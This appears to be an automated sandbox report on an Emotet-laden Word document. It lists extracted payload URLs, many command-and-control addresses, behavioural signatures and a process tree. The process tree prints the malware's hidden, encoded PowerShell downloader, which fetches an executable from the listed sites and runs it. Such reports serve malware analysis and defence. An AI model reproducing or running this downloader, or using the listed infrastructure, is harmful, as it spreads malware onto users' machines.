Analysis
-
max time kernel
149s -
resource
win10v191014 -
submitted
13-12-2019 12:59
Task
task1
Sample
Docs_7fd7b14acff688e84b811d03e1831552.10.doc
Resource
win7v191014
General
Malware Config
Extracted
http://kaikeline.com/1B/
http://irpot.com/css/jRk5gg/
http://kartcup.net/picture_library/eqop/
http://lakelass.com/cgi-bin/2dhm/
http://ouimet.biz/cgi-bin/l/
Extracted
emotet
173.91.11.142:80
47.6.15.79:80
47.6.15.79:443
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
45.56.88.91:443
101.187.134.207:443
1.33.230.137:80
110.143.57.109:80
108.191.2.72:80
47.156.70.145:80
167.71.10.37:8080
190.226.44.20:21
74.105.102.97:8080
190.147.215.53:22
24.45.193.161:7080
70.175.171.251:80
138.59.177.106:443
12.176.19.218:80
190.56.255.118:80
190.211.207.11:443
182.176.132.213:8090
31.131.182.30:80
31.31.77.83:443
181.57.193.14:80
149.202.153.252:8080
189.209.217.49:80
169.239.182.217:8080
98.24.231.64:80
176.106.183.253:8080
159.65.25.128:8080
211.63.71.72:8080
45.51.40.140:80
104.131.44.150:8080
85.72.180.68:80
100.14.117.137:80
110.143.84.202:80
188.152.7.140:80
167.99.105.223:7080
186.75.241.230:80
45.33.49.124:443
12.176.19.218:80
50.116.86.205:8080
62.75.187.192:8080
210.6.85.121:80
91.205.215.66:8080
128.65.154.183:443
209.141.54.221:8080
107.170.24.125:8080
178.210.51.222:8080
197.254.221.174:80
66.76.63.99:80
100.14.117.137:80
201.184.105.242:443
101.187.247.29:80
217.160.182.191:8080
107.2.2.28:80
45.51.40.140:80
190.12.119.180:443
212.186.191.177:80
218.44.21.114:80
61.197.110.214:80
165.227.156.155:443
12.229.155.122:80
67.225.179.64:8080
46.105.131.87:80
178.209.71.63:8080
192.241.255.77:8080
59.103.164.174:80
74.105.102.97:8080
185.159.102.74:80
47.156.70.145:80
64.53.242.181:8080
2.38.99.79:80
5.88.182.250:80
110.142.38.16:80
75.80.148.244:80
206.189.112.148:8080
183.102.238.69:465
78.24.219.147:8080
200.7.243.108:443
209.97.168.52:8080
201.173.217.124:443
190.53.135.159:21
73.11.153.178:8080
73.176.241.255:80
104.237.155.168:443
87.106.136.232:8080
75.80.148.244:80
83.136.245.190:8080
212.129.24.79:8080
5.196.74.210:8080
116.48.142.21:443
167.114.242.226:8080
103.86.49.11:8080
70.175.171.251:80
212.64.171.206:80
139.130.241.252:443
206.81.10.215:8080
95.128.43.213:8080
12.229.155.122:80
87.106.139.101:8080
37.157.194.134:443
91.73.197.90:80
80.21.182.46:80
64.53.242.181:8080
58.171.42.66:8080
93.147.141.5:80
176.31.200.130:8080
87.230.19.21:8080
104.236.246.93:8080
144.139.247.220:80
195.244.215.206:80
181.31.213.158:8080
104.131.11.150:8080
120.150.246.241:80
181.143.194.138:443
165.228.24.197:80
92.222.216.44:8080
31.172.240.91:8080
86.98.156.239:443
Signatures
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4904 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4904 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4596 Powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 5040 wrote to memory of 5068 5040 SppExtComObj.exe 74 PID 4596 wrote to memory of 4132 4596 Powershell.exe 81 PID 4132 wrote to memory of 4664 4132 16.exe 86 -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4904 WINWORD.EXE 4132 16.exe 4664 16.exe -
Executes dropped EXE 2 IoCs
pid Process 4132 16.exe 4664 16.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 4664 16.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4596 Powershell.exe -
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7fd7b14acff688e84b811d03e1831552.10.doc" /o ""1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4904
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:5068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABKAGQAZwB5AHQAbABnAHEAbgB0AHUAPQAnAFcAaABiAGsAYwB6AGEAaQBxAHIAZwBuACcAOwAkAE8AYwB3AHkAcAB5AGQAeABtAGoAagBnAGUAIAA9ACAAJwAxADYAJwA7ACQAWQBrAG4AdABkAGoAbwBpAHQAcAA9ACcASABsAGoAZQB2AGcAaQBhAGYAaAAnADsAJABUAHUAeQBjAHgAeABsAHoAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBjAHcAeQBwAHkAZAB4AG0AagBqAGcAZQArACcALgBlAHgAZQAnADsAJABGAHkAZgBzAG0AegBsAHQAPQAnAFMAZABmAGEAbwBsAGkAeQBpAHYAbgBuACcAOwAkAFUAYgBkAGwAaQB0AHcAcwBnAGwAaABzAGMAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AdwBlAGIAYwBMAGkARQBOAHQAOwAkAFgAcwBjAGsAeAB5AGcAegBoAG4AcwB1AHMAPQAnAGgAdAB0AHAAOgAvAC8AawBhAGkAawBlAGwAaQBuAGUALgBjAG8AbQAvADEAQgAvACoAaAB0AHQAcAA6AC8ALwBpAHIAcABvAHQALgBjAG8AbQAvAGMAcwBzAC8AagBSAGsANQBnAGcALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAdABjAHUAcAAuAG4AZQB0AC8AcABpAGMAdAB1AHIAZQBfAGwAaQBiAHIAYQByAHkALwBlAHEAbwBwAC8AKgBoAHQAdABwADoALwAvAGwAYQBrAGUAbABhAHMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADIAZABoAG0ALwAqAGgAdAB0AHAAOgAvAC8AbwB1AGkAbQBlAHQALgBiAGkAegAvAGMAZwBpAC0AYgBpAG4ALwBsAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEgAbQBrAGcAcgBvAGgAcQBsAGoAbwBmAGUAPQAnAFUAZAB2AHAAbgB0AGcAegB1AHIAeAByAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAeQBsAHgAcABrAG4AcAB3AGwAZQBtACAAaQBuACAAJABYAHMAYwBrAHgAeQBnAHoAaABuAHMAdQBzACkAewB0AHIAeQB7ACQAVQBiAGQAbABpAHQAdwBzAGcAbABoAHMAYwAuACIARABgAG8AYAB3AE4ATABvAEEAZABGAGAASQBMAGUAIgAoACQAQgB5AGwAeABwAGsAbgBwAHcAbABlAG0ALAAgACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAUQByAGUAaABsAGEAbwBlAD0AJwBNAGIAcgB3AG0AagBnAG4AYwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFQAdQB5AGMAeAB4AGwAegBuACkALgAiAGwARQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwA4ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAWQBnAGQAYQBtAHEAbwB1AHcAYQBxAGkAPQAnAEEAdwBqAHcAZgB6AHQAZwBhAHIAcABjAGgAJwA7AGIAcgBlAGEAawA7ACQARABlAGwAbAB5AHQAeABlAGsAbgB5AD0AJwBMAG0AawBpAGMAcQBpAGoAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHkAcgBnAG0AbABrAGkAZwBkAD0AJwBGAHgAdgBjAGMAcwB5AGoAZwBqAGwAdgBvACcA1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4596 -
C:\Users\Admin\16.exe"C:\Users\Admin\16.exe"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4132 -
C:\Users\Admin\16.exe--9b97a9af3⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:4664
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
PID:4284
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:3756
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵PID:784
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵PID:2372
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:4504